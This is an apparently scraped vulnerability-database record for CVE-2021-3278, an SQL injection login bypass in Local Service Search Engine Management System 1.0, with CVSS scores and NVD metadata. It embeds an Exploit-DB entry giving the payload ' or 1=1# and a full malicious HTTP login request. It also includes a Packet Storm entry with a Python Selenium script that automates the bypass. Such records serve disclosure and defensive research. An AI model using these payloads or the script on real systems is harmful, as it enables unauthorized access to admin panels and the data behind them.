Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass

2020-12-02T00:00:00

Description

{"id": "EDB-ID:49163", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass", "description": "", "published": "2020-12-02T00:00:00", "modified": "2020-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/49163", "reporter": "Aditya Wakhlu", "references": [], "cvelist": ["2021-3278", "CVE-2021-3278"], "immutableFields": [], "lastseen": "2022-05-13T17:42:21", "viewCount": 336, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-3278"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162919"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-25004", "CVE-2020-25005", "CVE-2020-25006"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162919"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/49163", "sourceData": "# Exploit Title: Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass\r\n# Date: 21/11/2020\r\n# Exploit Author: Aditya Wakhlu\r\n# Vendor Homepage: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lssems.zip\r\n# Version: 1.0\r\n# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4\r\n# CVE: CVE-2021-3278\r\n\r\nStep 1: Open the URL http://localhost:8080/lssems/admin/login.php\r\nStep 2: use payload Aditya' or 1=1# in user and password field\r\n\r\nMalicious Request:::\r\n\r\nPOST /lssems/admin/ajax.php?action=login HTTP/1.1\r\nHost: localhost:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 49\r\nOrigin: http://localhost:8080\r\nConnection: close\r\nReferer: http://localhost:8080/lssems/admin/login.php\r\nCookie: PHPSESSID=mpqu31slfcd7fjc89gm9veb1o3\r\n\r\nusername=Aditya'+or+1%3D1%23&password=Aditya'+or+1%3D1%23", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"cve": [{"lastseen": "2022-04-26T20:14:31", "description": "Local Service Search Engine Management System 1.0 has a vulnerability through authentication bypass using SQL injection . Using this vulnerability, an attacker can bypass the login page.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T18:16:00", "type": "cve", "title": "CVE-2021-3278", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3278"], "modified": "2022-04-26T16:33:00", "cpe": ["cpe:/a:local_services_search_engine_management_system_project:local_services_search_engine_management_system:1.0"], "id": "CVE-2021-3278", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3278", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:local_services_search_engine_management_system_project:local_services_search_engine_management_system:1.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2021-06-03T15:19:56", "description": "", "published": "2021-06-02T00:00:00", "type": "packetstorm", "title": "Local Service Search Engine Management System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3278"], "modified": "2021-06-02T00:00:00", "id": "PACKETSTORM:162919", "href": "https://packetstormsecurity.com/files/162919/Local-Service-Search-Engine-Management-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: SQL injection, bypass the login page, Local Service Search Engine Management System 1.0 \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 06.02.2021 \n# Vendor: https://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html \n# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip \n# CVE: CVE-2021-3278 \n# Proof: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278 \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# Debug: @nu11secur1ty \n# CVE: CVE-2021-3278 \n \nfrom selenium import webdriver \nimport time \n \n \n#enter the link to the website you want to automate login. \nwebsite_link=\"http://192.168.1.4/lssems/admin/login.php\" \n \n#enter your login username SQL bling injection \nusername=\"nu11secur1ty' or 1=1#\" \n#enter your login password SQL bling injection \npassword=\"nu11secur1ty' or 1=1#\" \n \n# test and proof the SQL injection \n# user: admin \n# password: password \n \n#enter the element for username input field \nelement_for_username=\"username\" \n#enter the element for password input field \nelement_for_password=\"password\" \n \n#enter the element for submit button by class \nelement_for_submit=\"btn-sm.btn-block.btn-wave.col-md-4.btn-primary\" \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \ntime.sleep(3) \nsignInButton = browser.find_element_by_class_name(element_for_submit) \nsignInButton.click() \n \nprint(\"payload is deployed NOW, you have SQL Authentication Bypass =)...\\n\") \n \nexcept Exception: \n#### This exception occurs if the element are not found in the webpage. \nprint(\"Some error occured :(\") \n \n \n--------------------------------- \n \n# Exploit Title: SQL injection, bypass the login page, Local Service Search \nEngine Management System 1.0 \n# Date: 06.02.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: \nhttps://www.sourcecodester.com/php/14607/local-service-search-engine-management-system-using-phpmysqli-source-code.html \n# Software Link: \nhttps://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3278/lssems.zip \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3278 \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162919/localssems10-sql.txt"}]}

Local Service Search Engine Management System 1.0 - SQLi Authentication Bypass

Description

Related